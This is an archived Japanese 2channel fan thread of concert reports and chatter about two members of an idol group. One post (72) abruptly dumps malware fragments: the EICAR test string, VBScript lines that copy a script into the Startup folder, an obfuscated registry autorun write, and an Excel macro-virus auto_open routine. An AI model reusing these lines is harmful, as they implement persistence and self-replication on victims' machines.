5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

隙間産業愛$【3拠点目】

1 :大宮のパン屋:2006/12/17(日) 22:48:41 ID:cVojgPVC
●大Sタカと宮Kユウジによる隙間産業愛$ユニットについて語るスレです。
●他面および他面担叩きは禁止。
●sage進行。
●安置、同じ人、真性、緑はヌルー。
●>950踏んだら次スレおながいします。

前スレ
隙間産業愛$【2拠点目】
http://tv8.2ch.net/test/read.cgi/jan/1128250888/


2 :過去ログ:2006/12/17(日) 22:51:07 ID:cVojgPVC
【ジャニーズ】内気な性格のジャニタレ
http://tv8.2ch.net/test/read.cgi/jan/1070428696/



3 :ななしじゃにー:2006/12/17(日) 23:10:57 ID:p+eCs7Cv
リーダーについて行きます、わたくし。ヽ.゚ー゚ノ(´・∀・`) ミルクパンはオレが焼く!

待たせテンガロン!
大S(タカ)と宮K(ユウジ)が華麗に舞う隙間産業愛$ユニット
活動拠点はマレーシア!ファイナルラブでオタンコナスドモのハートをスキューンバズーカ!
アルバムが出るその日まで、俺らについて来いよ!

宮K:こちらが大宮スレなんでございますよ。
大S:活動拠点はここだぞ、オマエら。
宮K:安置・荒らしは困ります。ほっこりsageて行きたい訳で。
大S:zzz…
宮K:厨は完全ヌルーでよろぴくって事で。
大S:…
宮K:テメー何もやってねェだろーがよ!

4 :技リスト :2006/12/17(日) 23:14:55 ID:p+eCs7Cv
【鋼(はがね)】
彼らの国(どこかは謎)の伝統的なスゴイ技
1年の312日目の祭りで披露されたりする
鍛え上げられた究極の肉体を持つ人々はどれだけ衝撃を与えられても
『絶対に』痛がらないという
今現在腹筋、ティクビ、スネ毛の存在が確認されている
腹筋に対する衝撃はパンチ、ティクビは捻り、スネ毛はテープによる強制引き抜きである
ちなみにタカは鋼の腹筋とティクビ、ユウジはスネ毛をもっている

鋼の腹筋(タカ)---その名の通り、腹筋が鋼のように固い。どれだけ強く殴っても痛くない。
(又はそのフリをすることができる)
〜すね毛(ユウジ)---ガムテですね毛を根こそぎ抜いても痛くない。
(又はそのフリをすることができる)
すね毛が強いのか、すねが強いのかは不明。
【サマースポット 】

【ファイナルラブ(R指定) 】
大宮SKの最終目標だった技だが、2005年に実施された。


5 :ななしじゃにー:2006/12/18(月) 15:15:21 ID:fho2FuIH
乙!

6 :ななしじゃにー:2006/12/19(火) 01:32:29 ID:7CiSRv6W
鋼の乙!

7 :ななしじゃにー:2006/12/19(火) 12:12:36 ID:+2MlP/pr
>1
乙!

そして前スレ>999キモイ

8 :ななしじゃにー:2006/12/19(火) 12:21:33 ID:4N9wrN0i
>3
あ、結局貼ったのね。

9 :ななしじゃにー:2006/12/19(火) 19:57:47 ID:oy5IOys5
              ___                 
\\     /|        /                
  \\     |       /                 
  //    |     /                  
//    __|_   (___ゝ         

10 :ななしじゃにー:2006/12/19(火) 22:43:52 ID:OUgq5zdl
>1
乙華麗。

鋼の乳首ジャンケンでもやってもらおうじゃないか。

11 :ななしじゃにー:2006/12/20(水) 02:37:08 ID:Jy79bT5u
K→Sへ鋼のモミニュケーションは日常茶飯事ですからねえ。

12 :ななしじゃにー:2006/12/20(水) 21:01:49 ID:oiRIky+A
平安またかよ!ww

13 :ななしじゃにー:2006/12/26(火) 00:59:55 ID:aXBQMmst
なに今日の大宮祭り(*´Д`)

14 :ななしじゃにー:2006/12/26(火) 01:00:30 ID:Vf5nBf5X
「恥ずかしい」「大丈夫だよ」って、萌え殺す気か!www

15 :ななしじゃにー:2006/12/26(火) 01:28:14 ID:elRSHQxJ
ストッキング兄弟キタコレ

16 :ななしじゃにー:2006/12/26(火) 02:14:08 ID:dVYJRmiM
ごちそうさまですた

17 :ななしじゃにー:2006/12/26(火) 03:15:55 ID:WZxqYixD
ストッキングでファイナルラブやるかと思ったじゃないかww

18 :ななしじゃにー:2006/12/26(火) 09:53:38 ID:QbBRGUwx
感動の再会w

19 :ななしじゃにー:2006/12/26(火) 14:35:32 ID:296swKSZ
6歳と3歳のときに生き別れに

20 :ななしじゃにー:2006/12/26(火) 16:45:38 ID:1d+Zp19m
全米が泣いた

21 :ななしじゃにー:2006/12/26(火) 17:25:15 ID:cq/3d6Ua
6歳と3歳を想像して萌え(*´Д`)

22 :ななしじゃにー:2006/12/26(火) 21:01:53 ID:QbBRGUwx
ムキムキマソの試練を二人で禿増しあうw

23 :ななしじゃにー:2006/12/26(火) 21:18:51 ID:GdAUtGg8
やっと見れた。
ストッキング兄弟(*´Д`)
すごろくアリガd!

24 :ななしじゃにー:2006/12/26(火) 21:45:48 ID:egxt3Wky
禿増しあうといっても、ムキムキマソの試練は大Sのみw

25 :ななしじゃにー:2006/12/29(金) 12:36:26 ID:cjJ9IGcc
KがSの顔を両手で持った時、
チュー、チュー、チュー!、チュー!!
と心の中で言ってごめんなさい。

26 :ななしじゃにー:2006/12/29(金) 12:41:44 ID:sFGkRfks
>25
大丈夫、皆おまいと同じことを思ったさ。
チッス、チッス、チッス! チッス!!

27 :ななしじゃにー:2006/12/30(土) 18:08:43 ID:zy8gpP2p
席となりで映画鑑賞(*´Д`*)

28 :ななしじゃにー:2006/12/30(土) 18:45:22 ID:Y2W3Jkjv
(*´Д`)

他の3人はいなかったのか??

29 :ななしじゃにー:2006/12/30(土) 23:45:10 ID:95+wiK8Y
>27
kwsk!!

30 :ななしじゃにー:2006/12/31(日) 12:13:24 ID:Yrx4C7zX
>>29
ニッキ見てないの?

31 :名無しジャニー:2007/01/04(木) 00:12:45 ID:akoG1Ugj
写真集の小僧の最後のコメントヤバスwwwww

32 :ななしじゃにー:2007/01/04(木) 00:16:38 ID:akoG1Ugj
スマソorzしくった

33 :ななしじゃにー:2007/01/04(木) 01:39:45 ID:7Qau8huO
大宮の新技について詳しいレポをおながいしたい…

34 :新技ネタバレ:2007/01/04(木) 02:58:22 ID:Bd04H/So
新技「ダッシュ ドッキング 2007」
舞台上下から2人が勢いよく走り寄り、激しく体当たりする技。
この技は、座らず、立って見たほうが迫力がある。(ユウジ談。)







【新技内容】
タカが上手、ユウジが下手から勢い良く走り、
走り幅跳びよろしく、2人ともお互いに向かってジャンプ!
「危ない。ぶつかる!」と思うが、
ぶつかる前に2人、奈落に落ちる。
!?と思うのもつかの間、
奈落には布団が敷いてあり、
2人が仲良く布団に寝そべって浮上。
タカの腕の中で眠る(実は肩を震わせて笑っている)ユウジ。
言葉もなく、そのまま、2人はまた奈落に消えていく・・・。

35 :ななしじゃにー:2007/01/04(木) 08:01:29 ID:S1oyjQqw
>34
トン!

アフォ過ぎて朝からワロタwww

36 :ななしじゃにー:2007/01/04(木) 09:54:25 ID:M+QBBrOh
>>34
(*´Д`)…



(*´Д`*)

37 :ななしじゃにー:2007/01/04(木) 10:06:55 ID:97UgBlnI
こっち見んなw
いや、見てもいいぞ

>31 も気になるので帰って来て欲しい

38 :ななしじゃにー:2007/01/04(木) 10:50:09 ID:8sK6wtpr
(*´д`*)カバエエすぎる…

39 :ななしじゃにー:2007/01/04(木) 11:13:29 ID:vnomzVpE
写真集のカンコックの個人ページで
大宮はお互いを撮り合ってるんだが、他メンはいなかったのか脳?

40 :ななしじゃにー:2007/01/04(木) 13:12:15 ID:akoG1Ugj
写真集の最後の小僧のコメントに昨日平安サンにチッスされました と書いてあるwwwww

41 :ななしじゃにー:2007/01/04(木) 23:39:13 ID:hTKYACAE
本日2部にて。
「俺らの名前は何だっけ?」の前に、早々と手を繋いでしまい
苦笑いしつつも、手を離さない2人にモヘました(*´Д`)

あと新技はまだ一度も成功していないらしいw


42 :ななしじゃにー:2007/01/04(木) 23:57:04 ID:M+QBBrOh
>>41
(*´Д`)人(´Д`*)

43 :ななしじゃにー:2007/01/05(金) 01:16:37 ID:fr6Wa5zD
本日2恥部曲名失念だが終盤衣装チェンヂのためバクステ奥へはける際
お手手つないで暗闇に消えてゆきますたwww

44 :ななしじゃにー:2007/01/05(金) 02:13:31 ID:dwZ/3Zgd
>43
mjdk?
どこ見てたんだ?自分orz

45 :ななしじゃにー:2007/01/05(金) 02:38:50 ID:fr6Wa5zD
>>44
すでに暗転間際だったから周辺民しか見えてナカタと思う
左右花道から歩み寄り、顔を見合わせて(ここで暗転)頷きしっかり手つなぎ
声にならない悲鳴があがってたwww

46 :ななしじゃにー:2007/01/05(金) 04:12:48 ID:6AARk/eo
だから悲鳴があがってたのか!
傘のソロが始まるのに、バックで悲鳴聞こえてビクーリだたw

47 :ななしじゃにー:2007/01/05(金) 13:15:29 ID:5AmeSTRj
おててつないではけたのは青。1恥部でもやってたよ。

48 :ななしじゃにー:2007/01/05(金) 19:21:05 ID:RpAVbCsb
本日、1恥部でもやってますた(*´∀`)

49 :ななしじゃにー:2007/01/05(金) 21:17:18 ID:QGXW/4x2
もちろん今日の二恥部でもやってました(´∀`)

50 :ななしじゃにー:2007/01/05(金) 23:41:44 ID:3EjzrbfZ
当然たこやきに期待!

51 :ななしじゃにー:2007/01/06(土) 01:10:33 ID:buJJEAMv
今日両部挨拶の時手繋いだままお手振りして萌え死んだw

52 :ななしじゃにー:2007/01/06(土) 03:05:12 ID:kXPDpQ28
5日2恥部
曲は忘れたが傘が歌ってる時、二人で傘のケツ触ってますたw
MC中も曲中も隣同士でキャッキャ
写真集も満載ですね

53 :ななしじゃにー:2007/01/06(土) 07:23:57 ID:8BLzfiqA
5日2恥部では
平安が隣の小僧の方ばかり向いて、
歪から喉の薬を貰った話をしててカバエかったw

アンコでは紙吹雪を掛け合ってたよな?

とにかく今回はモヘポインツが多くてホッコリしたよ。

54 :ななしじゃにー:2007/01/06(土) 22:49:02 ID:hldUvmZ5
5日2恥部餡子
平安→小僧 紙ふぶきをかける
小僧→平安の服の中に紙ふぶきを入れて逆襲

55 :ななしじゃにー:2007/01/07(日) 00:17:45 ID:gi8FOqLj
>>54
(*´Д`)

56 :ななしじゃにー:2007/01/07(日) 22:59:51 ID:5qOJwWhR
今日のどっち部か忘れたけど最後の「俺らの名前はー?」で手つなぐとこ。
早々に手をつなごうと「早く早く」って感じで手を差し出す平安。
小僧はそれに応えるため急いでマイクをポッケにしまって、結合。


57 :ななしじゃにー:2007/01/07(日) 23:11:43 ID:UcxTpD+p
>56
レポトンです!
その映像ほしい(*´Д`)

58 :ななしじゃにー:2007/01/08(月) 00:24:09 ID:d6ukW3T5
そして「俺等の名前は?」「あらちー」のあとずっと手をぎゅっと繋いだまま
お手振りして捌けていく二人www

59 :ななしじゃにー:2007/01/08(月) 10:35:06 ID:Z59jM6oo
花道でも二人でくっついてなんかやってたよな。
遠くて何やってるのかよく見えなかったが…。

60 :ななしじゃにー:2007/01/08(月) 15:08:42 ID:Urr2PXVZ
七日は青の手つなぎやってなかったよな?
本日一恥部は手つないで立ち止まり、その手を上に挙げてからはけていった。
やっぱり、あれ見るとほっこりする。

61 :ななしじゃにー:2007/01/08(月) 21:22:54 ID:/s5Xh/j8
7日2恥部
宮k「2007年を持ちまして大宮は…35周年になります!」
うる覚えですが、こんな一言があったように思う。
…の間が長くて、自分を含め客はハラハラしている感じだったw

62 :ななしじゃにー:2007/01/08(月) 22:20:52 ID:XdCZG7e0
今日のオーラス萌えまくりだった
いっぱいあって忘れるくらいだ

とにかく新技成功!ギューと抱き合う大宮カバエエ ‥

63 :ななしじゃにー:2007/01/08(月) 22:31:01 ID:PaOGs4S2
>61
今日は45周年になってますたw
何歳なんだ大宮

64 :ななしじゃにー:2007/01/08(月) 22:40:37 ID:n5ggVXP3
今日は大宮に嫉妬する歪が見れたそうですね

65 :ななしじゃにー:2007/01/08(月) 22:43:02 ID:n5ggVXP3
ageてしまった!!!すまん

66 :ななしじゃにー:2007/01/08(月) 23:43:17 ID:TmPm+Hzy
>64
なんで嫉妬?kwsk!

67 :ななしじゃにー:2007/01/09(火) 00:46:11 ID:BmgkSTgd
Sの耳を弄ぶK

68 :ななしじゃにー:2007/01/09(火) 01:07:06 ID:RP7EALpD
>66
64じゃないけど。
あらちー!で手つなぎしたあと、
お手振りして階段上ってる間も、
振り返って階段上でお手振りしてるときも
ずっと手をつなぎっぱなしだった二人をみて
歪が手刀でつないでる手を叩き切るアクションをしてふざけてた。
それでもつないだままだったけどねw

69 :ななしじゃにー:2007/01/09(火) 01:11:42 ID:3itjX7F+
>64ではないが、捌ける時にもまだ繋がれたままのタカとユウジの
手を歪が離そうと手を伸ばしたんだが離れず、二人の手は
がっつり繋がれたまま仲良く捌けて行きましたとさ。
めでたし。めでたし?

70 :ななしじゃにー:2007/01/09(火) 01:13:35 ID:3itjX7F+
ダダカブリスマソorz

71 :ななしじゃにー:2007/01/09(火) 02:17:17 ID:RtFSQnOU
俺達手を繋いでないと生きてけないの。っつーくらい繋ぎっぱなしの二人に乾杯。

72 :ななしじゃにー:2007/01/09(火) 16:42:45 ID:R4RJ4esC
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

73 :ななしじゃにー:2007/01/09(火) 23:16:55 ID:eBPp2mNq
>67
5リピ。

74 :ななしじゃにー:2007/01/10(水) 13:02:54 ID:922trzjX
最近二人の仲良しぶりがまた激しくなってきたと思うのは自分だけか?

75 :ななしじゃにー:2007/01/10(水) 13:05:11 ID:J8Nr9doS
ユウジの傘ブームが一段落したんんだろう       おかえりユウジ

76 :ななしじゃにー:2007/01/10(水) 14:43:25 ID:vypBwUsF
いつでもラブラブに見えてしまう件

77 :ななしじゃにー:2007/01/10(水) 15:25:27 ID:gAz8VzMQ
夏紺では実はちょっぴり淋しかったから、凱旋でまた仲良しぶりが見れて(*´∀`)

78 :ななしじゃにー:2007/01/10(水) 18:29:51 ID:GoqBpvy/
>>77
(*´∀`)ノシノシ

79 :ななしじゃにー:2007/01/11(木) 21:23:20 ID:XEAsE23W
波レポO.M.S.K.Sになっとるけどスキューンだよな。

80 :ななしじゃにー:2007/01/12(金) 00:14:31 ID:x1K9jONQ
記念パピコ!(*´・∀・`)人(.゚∀゚*)

81 :ななしじゃにー:2007/01/12(金) 00:14:33 ID:6AOL+lRK
大Sの"ダブルブッキング"も正解なのか?

82 :ななしじゃにー:2007/01/13(土) 00:12:55 ID:Unf2Sovg
そういや、紺最終公演の新技成功って、
布団は出てこなかったのか?
詳しい説明希望。

83 :ななしじゃにー:2007/01/13(土) 00:41:31 ID:Vj421C6D
>82
出てこなかったよ。
今まで通り両端から走ってってそのまま抱き合って、
成功だーと喜んで前行くか後ろ行くかしたらそのまま落ちて終了。
傘が超大笑いで出てきてた。
ひら「きもい」

84 :ななしじゃにー:2007/01/13(土) 17:04:24 ID:Pm/Bm44r
>83
トン!

85 :ななしじゃにー:2007/01/13(土) 19:55:27 ID:54xLwvcF
来週孫wktk

86 :ななしじゃにー:2007/01/15(月) 15:08:36 ID:S/23viqW
平安舞台のバレエみたいなのを大宮に大真面目に踊ってほしいな

87 :ななしじゃにー:2007/01/15(月) 15:46:44 ID:XJ234H9k
踊りは大真面目でも格好が変なんだろうなw
股間から白鳥の首生えてたりして…

88 :ななしじゃにー:2007/01/15(月) 18:31:05 ID:dfPa/nPM
ちょw
園長ktkr

89 :ななしじゃにー:2007/01/16(火) 00:55:12 ID:rIVTUUaM
粗宿のスタフ日記にイチャコラ情報w

90 :ななしじゃにー:2007/01/16(火) 01:14:36 ID:FydJfsjs
>>89
ワロタw
そりゃ?になるよなぁ…w

91 :ななしじゃにー:2007/01/16(火) 01:21:43 ID:g4476UzT
粗宿のスタフ日記読んで思い出した。
>83のひら「きもい」の後
「みんなはここでちょっと見るだけだからいいだろうけど
 俺ら2〜3年ぐらいずっと裏でもアレ見てるんだよ!」と
訴えてた。ウラヤマシスと思ったのは自分だけでは無いはずw

92 :ななしじゃにー:2007/01/17(水) 00:15:17 ID:EIfOMK0I
>91 ノシ
ずっと見せられてる3人がウラヤマシスw

93 :ななしじゃにー:2007/01/17(水) 00:22:01 ID:ewcfF3pl
+act、丼の下にぐりぐら。

(*´Д`*)


94 :ななしじゃにー:2007/01/17(水) 16:24:55 ID:msK/64GP
>93
なんで二人で座ってるんだwww

_ト ̄|○

95 :ななしじゃにー:2007/01/18(木) 16:52:34 ID:SDsgxPB8
>>94
オマイωどうしたよ

16 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)